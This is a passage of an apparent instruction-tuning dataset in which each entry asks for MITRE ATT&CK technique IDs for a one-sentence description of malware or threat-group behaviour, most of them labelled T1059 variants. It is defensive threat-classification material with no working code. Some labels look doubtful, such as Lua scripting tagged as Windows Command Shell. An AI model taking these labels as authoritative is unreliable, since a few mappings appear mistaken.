MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.", + "input": "FIN7 used SQL scripts to help perform tasks on the victim's machine.", + "output": "- T1059: Command and Scripting Interpreter" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.", + "input": "FIVEHANDS can receive a command line argument to limit file encryption to specified directories.", + "output": "- T1059: Command and Scripting Interpreter" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.", + "input": "Fox Kitten has used a Perl reverse shell to communicate with C2.", + "output": "- T1059: Command and Scripting Interpreter" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.", + "input": "Get2 has the ability to run executables with command-line arguments.", + "output": "- T1059: Command and Scripting Interpreter" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.", + "input": "Lazarus Group malware uses cmd.exe to execute commands on victims.", + "output": "- T1059: Command and Scripting Interpreter" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.", + "input": "Molerats used various implants, including those built on .NET, on target machines.", + "output": "- T1059: Command and Scripting Interpreter" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.", + "input": "MoonWind can execute commands via an interactive command shell.", + "output": "- T1059: Command and Scripting Interpreter" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.", + "input": "OilRig has used the command-line interface for execution.", + "output": "- T1059: Command and Scripting Interpreter" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.", + "input": "OilRig has used various types of scripting for execution.", + "output": "- T1059: Command and Scripting Interpreter" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.", + "input": "P.A.S. Webshell has the ability to create reverse shells with Perl scripts.", + "output": "- T1059: Command and Scripting Interpreter" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.", + "input": "PoetRAT has executed a Lua script through a Lua interpreter for Windows.", + "output": "- T1059: Command and Scripting Interpreter" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.", + "input": "SpeakUp uses Perl scripts.", + "output": "- T1059: Command and Scripting Interpreter" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.", + "input": "Stealth Falcon malware uses WMI to script data collection and command execution on the victim.", + "output": "- T1059: Command and Scripting Interpreter" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.", + "input": "WINERACK can create a reverse shell that utilizes statically-linked Wine cmd.exe code to emulate Windows command prompt commands.", + "output": "- T1059: Command and Scripting Interpreter" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.", + "input": "CrackMapExec can execute PowerShell commands via WMI.", + "output": "- T1059.001: Command and Scripting Interpreter - PowerShell" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.", + "input": "KOCTOPUS has used PowerShell commands to download additional files.", + "output": "- T1059.001: Command and Scripting Interpreter - PowerShell" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.", + "input": "Meteor can use PowerShell commands to disable the network adapters on a victim machines.", + "output": "- T1059.001: Command and Scripting Interpreter - PowerShell" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.", + "input": "SeaDuke uses a module to execute Mimikatz with PowerShell to perform Pass the Ticket.", + "output": "- T1059.001: Command and Scripting Interpreter - PowerShell" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.", + "input": "StrongPity can use PowerShell to add files to the Windows Defender exclusions list.", + "output": "- T1059.001: Command and Scripting Interpreter - PowerShell" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.", + "input": "4H RAT has the capability to create a remote shell.", + "output": "- T1059.003: Command and Scripting Interpreter - Windows Command Shell" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.", + "input": "APT37 has used the command-line interface.", + "output": "- T1059.003: Command and Scripting Interpreter - Windows Command Shell" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.", + "input": "APT38 has used a command-line tunneler, NACHOCHEESE, to give them shell access to a victim\u2019s machine.", + "output": "- T1059.003: Command and Scripting Interpreter - Windows Command Shell" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.", + "input": "BISCUIT has a command to launch a command shell on the system.", + "output": "- T1059.003: Command and Scripting Interpreter - Windows Command Shell" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.", + "input": "BLACKCOFFEE has the capability to create a reverse shell.", + "output": "- T1059.003: Command and Scripting Interpreter - Windows Command Shell" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.", + "input": "Bankshot uses the command-line interface to execute arbitrary commands.", + "output": "- T1059.003: Command and Scripting Interpreter - Windows Command Shell" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.", + "input": "\"BoxCaon can execute arbitrary commands and utilize the \"\"ComSpec\"\" environment variable.\"", + "output": "- T1059.003: Command and Scripting Interpreter - Windows Command Shell" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.", + "input": "Cardinal RAT can execute commands.", + "output": "- T1059.003: Command and Scripting Interpreter - Windows Command Shell" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.", + "input": "China Chopper's server component is capable of opening a command terminal.", + "output": "- T1059.003: Command and Scripting Interpreter - Windows Command Shell" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.", + "input": "Darkhotel has dropped an mspaint.lnk shortcut to disk which launches a shell script that downloads and executes a file.", + "output": "- T1547.009: Boot or Logon Autostart Execution - Shortcut Modification\n- T1059.003: Command and Scripting Interpreter - Windows Command Shell" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.", + "input": "Dipsind can spawn remote shells.", + "output": "- T1059.003: Command and Scripting Interpreter - Windows Command Shell" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.", + "input": "DownPaper uses the command line.", + "output": "- T1059.003: Command and Scripting Interpreter - Windows Command Shell" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.", + "input": "Dragonfly 2.0 used various types of scripting to perform operations, including batch scripts.", + "output": "- T1059.003: Command and Scripting Interpreter - Windows Command Shell" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.", + "input": "During Night Dragon, threat actors used zwShell to establish full remote control of the connected machine and run command-line shells.", + "output": "- T1059.003: Command and Scripting Interpreter - Windows Command Shell" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.", + "input": "Ember Bear had used `cmd.exe` and Windows Script Host (wscript) to execute malicious code.", + "output": "- T1059.003: Command and Scripting Interpreter - Windows Command Shell" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.", + "input": "Emissary has the capability to create a remote shell and execute specified commands.", + "output": "- T1059.003: Command and Scripting Interpreter - Windows Command Shell" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.", + "input": "EvilBunny has an integrated scripting engine to download and execute Lua scripts.", + "output": "- T1059.003: Command and Scripting Interpreter - Windows Command Shell" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.", + "input": "FIN10 has executed malicious .bat files containing PowerShell commands.", + "output": "- T1059.003: Command and Scripting Interpreter - Windows Command Shell" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.", + "input": "FIN7 used the command prompt to launch commands on the victim\u2019s machine.", + "output": "- T1059.003: Command and Scripting Interpreter - Windows Command Shell" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.", + "input": "Felismus uses command line for execution.", + "output": "- T1059.003: Command and Scripting Interpreter - Windows Command Shell" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.", + "input": "Following exploitation with LOWBALL malware, admin@338 actors created a file containing a list of commands to be executed on the compromised computer.", + "output": "- T1059.003: Command and Scripting Interpreter - Windows Command Shell" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.", + "input": "\"Frankenstein has run a command script to set up persistence as a scheduled task named \"\"WinUpdate\"\", as well as other encoded commands from the command-line.\"", + "output": "- T1059.003: Command and Scripting Interpreter - Windows Command Shell" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.", + "input": "GravityRAT executes commands remotely on the infected host.", + "output": "- T1059.003: Command and Scripting Interpreter - Windows Command Shell" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.", + "input": "HAWKBALL has created a cmd.exe reverse shell, executed commands, and uploaded output via the command line.", + "output": "- T1059.003: Command and Scripting Interpreter - Windows Command Shell" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.", + "input": "HTTPBrowser is capable of spawning a reverse shell on a victim.", + "output": "- T1059.003: Command and Scripting Interpreter - Windows Command Shell" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.", + "input": "Hi-Zor has the ability to create a reverse shell.", + "output": "- T1059.003: Command and Scripting Interpreter - Windows Command Shell" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.", + "input": "JPIN can use the command-line utility cacls.exe to change file permissions.", + "output": "- T1059.003: Command and Scripting Interpreter - Windows Command Shell\n- T1222.001: File and Directory Permissions Modification - Windows File and Directory Permissions Modification" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.", + "input": "KGH_SPY has the ability to set a Registry key to run a cmd.exe command.", + "output": "- T1059.003: Command and Scripting Interpreter - Windows Command Shell" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.", + "input": "KOMPROGO is capable of creating a reverse shell.", + "output": "- T1059.003: Command and Scripting Interpreter - Windows Command Shell" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.", + "input": "Ke3chang has used batch scripts in its malware to install persistence mechanisms.", + "output": "- T1059.003: Command and Scripting Interpreter - Windows Command Shell" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.", + "input": "Leviathan uses a backdoor known as BADFLICK that is is capable of generating a reverse shell, and has used multiple types of scripting for execution, including JavaScript and JavaScript Scriptlets in XML..", + "output": "- T1059.003: Command and Scripting Interpreter - Windows Command Shell" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.", + "input": "Linfo creates a backdoor through which remote attackers can start a remote shell.", + "output": "- T1059.003: Command and Scripting Interpreter - Windows Command Shell" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.", + "input": "Lizar has a command to open the command-line on the infected system.", + "output": "- T1059.003: Command and Scripting Interpreter - Windows Command Shell" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific 